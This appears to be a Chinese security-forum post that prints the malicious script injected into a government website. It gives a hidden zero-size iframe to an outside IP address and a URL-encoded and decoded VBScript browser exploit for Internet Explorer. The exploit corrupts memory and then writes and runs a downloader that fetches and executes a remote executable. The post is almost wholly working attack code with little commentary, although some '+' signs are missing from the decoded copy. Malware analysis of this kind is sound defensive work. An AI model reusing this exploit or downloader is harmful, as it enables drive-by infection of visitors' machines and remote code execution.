挂马页面:hxxp://nyj.longmen.gov.cn/onews.asp?id=369
[mw_shl_code=html,true]<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>[/mw_shl_code]
[mw_shl_code=html,true]<iframe src=http://220.128.95.71 width=0 height=0></iframe>[/mw_shl_code]
[mw_shl_code=html,true]<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3C%21doctype%20html%3E%0A%3Chtml%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEmulateIE8%22%20%3E%0A%3Chead%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0A%0Afunction%20runmumaa%28%29%20%0AOn%20Error%20Resume%20Next%0ASet%20objWsh%20%3D%20CreateObject%28%22Wscript.Shell%22%29%0A%0AobjWsh.run%20%22cmd.exe%20/c%20echo%20%3E%3Ec%3A%5Ctext.vbs%20Set%20xPost%3DcreateObject%28%22%22Microsoft.XMLHTTP%22%22%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20xPost.Open%20%22%22GET%22%22%2C%22%22http%3A//220.128.95.71/calc.exe%22%22%2C0%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20xPost.Send%28%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20set%20sGet%3DcreateObject%28%22%22ADODB.Stream%22%22%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Mode%3D3%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Type%3D1%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Open%28%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Write%20xPost.ResponseBody%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.SaveToFile%20%22%22c%3A%5Cputty.exe%22%22%2C2%22%2C0%0AobjWsh.run%20%22cscript.exe%20c%3A%5Ctext.vbs%22%2C0%2Ctrue%0Awscript.sleep%2010000%0AobjWsh.run%20%22c%3A%5Cputty.exe%22%0Adocument.write%28Err.Description%29%0Aend%20function%0A%0A%3C/script%3E%0A%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0A%20%0Adim%20%20%20aa%28%29%0Adim%20%20%20ab%28%29%0Adim%20%20%20a0%0Adim%20%20%20a1%0Adim%20%20%20a2%0Adim%20%20%20a3%0Adim%20%20%20win9x%0Adim%20%20%20intVersion%0Adim%20%20%20rnda%0Adim%20%20%20funclass%0Adim%20%20%20myarray%0A%0ABegin%28%29%0A%0Afunction%20Begin%28%29%0A%20%20On%20Error%20Resume%20Next%0A%20%20info%3DNavigator.UserAgent%0A%0A%20%20if%28instr%28info%2C%22Win64%22%29%3E0%29%20%20%20then%0A%20%20%20%20%20exit%20%20%20function%0A%20%20end%20if%0A%0A%20%20if%20%28instr%28info%2C%22MSIE%22%29%3E0%29%20%20%20then%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20intVersion%20%3D%20CInt%28Mid%28info%2C%20InStr%28info%2C%20%22MSIE%22%29%20+%205%2C%202%29%29%20%20%20%0A%20%20else%0A%20%20%20%20%20exit%20%20%20function%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20end%20if%0A%0A%20%20win9x%3D0%0A%0A%20%20BeginInit%28%29%0A%20%20If%20Create%28%29%3DTrue%20Then%0A%20%20%20%20%20myarray%3D%20%20%20%20%20%20%20%20chrw%2801%29%26chrw%282176%29%26chrw%2801%29%26chrw%2800%29%26chrw%2800%29%26chrw%2800%29%26chrw%2800%29%26chrw%2800%29%0A%20%20%20%20%20myarray%3Dmyarray%26chrw%2800%29%26chrw%2832767%29%26chrw%2800%29%26chrw%280%29%0A%0A%20%20%20%20%20if%28intVersion%3C4%29%20then%0A%20%20%20%20%20%20%20%20%20document.write%28%22%3Cbr%3E%20IE%22%29%0A%20%20%20%20%20%20%20%20%20document.write%28intVersion%29%0A%20%20%20%20%20%20%20%20%20runshellcode%28%29%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20else%20%20%0A%20%20%20%20%20%20%20%20%20%20setnotsafemode%28%29%0A%20%20%20%20%20end%20if%0A%20%20end%20if%0Aend%20function%0A%0Afunction%20BeginInit%28%29%0A%20%20%20Randomize%28%29%0A%20%20%20redim%20aa%285%29%0A%20%20%20redim%20ab%285%29%0A%20%20%20a0%3D13+17*rnd%286%29%0A%20%20%20a3%3D7+3*rnd%285%29%0Aend%20function%0A%0Afunction%20Create%28%29%0A%20%20On%20Error%20Resume%20Next%0A%20%20dim%20i%0A%20%20Create%3DFalse%0A%20%20For%20i%20%3D%200%20To%20400%0A%20%20%20%20If%20Over%28%29%3DTrue%20Then%0A%20%20%20%20%27%20%20%20document.write%28i%29%20%20%20%20%20%0A%20%20%20%20%20%20%20Create%3DTrue%0A%20%20%20%20%20%20%20Exit%20For%0A%20%20%20%20End%20If%20%0A%20%20Next%0Aend%20function%0A%0Asub%20testaa%28%29%0Aend%20sub%0A%0Afunction%20mydata%28%29%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20%20i%3Dtestaa%0A%20%20%20%20%20i%3Dnull%0A%20%20%20%20%20redim%20%20Preserve%20aa%28a2%29%20%20%0A%20%20%0A%20%20%20%20%20ab%280%29%3D0%0A%20%20%20%20%20aa%28a1%29%3Di%0A%20%20%20%20%20ab%280%29%3D6.36598737437801E-314%0A%0A%20%20%20%20%20aa%28a1+2%29%3Dmyarray%0A%20%20%20%20%20ab%282%29%3D1.74088534731324E-310%20%20%0A%20%20%20%20%20mydata%3Daa%28a1%29%0A%20%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%20%0Aend%20function%20%0A%0A%0Afunction%20setnotsafemode%28%29%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20i%3Dmydata%28%29%20%20%0A%20%20%20%20i%3Dreadmemo%28i+8%29%0A%20%20%20%20i%3Dreadmemo%28i+16%29%0A%20%20%20%20j%3Dreadmemo%28i+%26h134%29%20%20%0A%20%20%20%20for%20k%3D0%20to%20%26h60%20step%204%0A%20%20%20%20%20%20%20%20j%3Dreadmemo%28i+%26h120+k%29%0A%20%20%20%20%20%20%20%20if%28j%3D14%29%20then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20j%3D0%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20redim%20%20Preserve%20aa%28a2%29%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20aa%28a1+2%29%28i+%26h11c+k%29%3Dab%284%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%20%0A%0A%20%20%20%20%20j%3D0%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20j%3Dreadmemo%28i+%26h120+k%29%20%20%20%0A%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Exit%20for%0A%20%20%20%20%20%20%20%20%20%20%20end%20if%0A%0A%20%20%20%20next%20%0A%20%20%20%20ab%282%29%3D1.69759663316747E-313%0A%20%20%20%20runmumaa%28%29%20%0Aend%20function%0A%0Afunction%20Over%28%29%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20dim%20type1%2Ctype2%2Ctype3%0A%20%20%20%20Over%3DFalse%0A%20%20%20%20a0%3Da0+a3%0A%20%20%20%20a1%3Da0+2%0A%20%20%20%20a2%3Da0+%26h8000000%0A%20%20%0A%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%0A%20%20%20%20redim%20%20%20ab%28a0%29%20%20%20%20%20%0A%20%20%0A%20%20%20%20redim%20%20Preserve%20aa%28a2%29%0A%20%20%0A%20%20%20%20type1%3D1%0A%20%20%20%20ab%280%29%3D1.123456789012345678901234567890%0A%20%20%20%20aa%28a0%29%3D10%0A%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20If%28IsObject%28aa%28a1-1%29%29%20%3D%20False%29%20Then%0A%20%20%20%20%20%20%20if%28intVersion%3C4%29%20then%0A%20%20%20%20%20%20%20%20%20%20%20mem%3Dcint%28a0+1%29*16%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20j%3Dvartype%28aa%28a1-1%29%29%0A%20%20%20%20%20%20%20%20%20%20%20if%28%28j%3Dmem+4%29%20or%20%28j*8%3Dmem+8%29%29%20then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%28vartype%28aa%28a1-1%29%29%3C%3E0%29%20%20Then%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20If%28IsObject%28aa%28a1%29%29%20%3D%20False%20%29%20Then%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20type1%3DVarType%28aa%28a1%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20end%20if%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20end%20if%0A%20%20%20%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20%20%20redim%20%20Preserve%20aa%28a0%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20exit%20%20function%0A%0A%20%20%20%20%20%20%20%20%20%20%20end%20if%20%0A%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20if%28vartype%28aa%28a1-1%29%29%3C%3E0%29%20%20Then%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20If%28IsObject%28aa%28a1%29%29%20%3D%20False%20%29%20Then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20type1%3DVarType%28aa%28a1%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20end%20if%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20end%20if%0A%20%20%20%20%20%20%20%20end%20if%0A%20%20%20%20end%20if%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20If%28type1%3D%26h2f66%29%20Then%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20Over%3DTrue%20%20%20%20%20%20%0A%20%20%20%20End%20If%20%20%0A%20%20%20%20If%28type1%3D%26hB9AD%29%20Then%0A%20%20%20%20%20%20%20%20%20%20Over%3DTrue%0A%20%20%20%20%20%20%20%20%20%20win9x%3D1%0A%20%20%20%20End%20If%20%20%0A%0A%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%0Aend%20function%0A%0Afunction%20ReadMemo%28add%29%20%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20redim%20%20Preserve%20aa%28a2%29%20%20%0A%20%20%0A%20%20%20%20ab%280%29%3D0%20%20%20%0A%20%20%20%20aa%28a1%29%3Dadd+4%20%20%20%20%20%0A%20%20%20%20ab%280%29%3D1.69759663316747E-313%20%20%20%20%20%20%20%0A%20%20%20%20ReadMemo%3Dlenb%28aa%28a1%29%29%20%20%0A%20%20%20%0A%20%20%20%20ab%280%29%3D0%20%20%20%20%0A%20%0A%20%20%20%20redim%20%20Preserve%20aa%28a0%29%0Aend%20function%0A%0A%3C/script%3E%0A%0A%3C/body%3E%0A%3C/html%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>[/mw_shl_code]
[mw_shl_code=html,true]<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")
objWsh.run "cmd.exe /c echo >>c:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>c:\text.vbs xPost.Open ""GET"",""http://220.128.95.71/calc.exe"",0 & echo >>c:\text.vbs xPost.Send() & echo >>c:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>c:\text.vbs sGet.Mode=3 & echo >>c:\text.vbs sGet.Type=1 & echo >>c:\text.vbs sGet.Open() & echo >>c:\text.vbs sGet.Write xPost.ResponseBody & echo >>c:\text.vbs sGet.SaveToFile ""c:\putty.exe"",2",0
objWsh.run "cscript.exe c:\text.vbs",0,true
wscript.sleep 10000
objWsh.run "c:\putty.exe"
document.write(Err.Description)
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13 17*rnd(6)
a3=7 3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1 2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i 8)
i=readmemo(i 16)
j=readmemo(i &h134)
for k=0 to &h60 step 4
j=readmemo(i &h120 k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1 2)(i &h11c k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i &h120 k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0 a3
a1=a0 2
a2=a0 &h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0 1)*16
j=vartype(aa(a1-1))
if((j=mem 4) or (j*8=mem 8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add 4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>[/mw_shl_code]
[mw_shl_code=html,true]http://220.128.95.71/calc.exe[/mw_shl_code]
样本文件:
|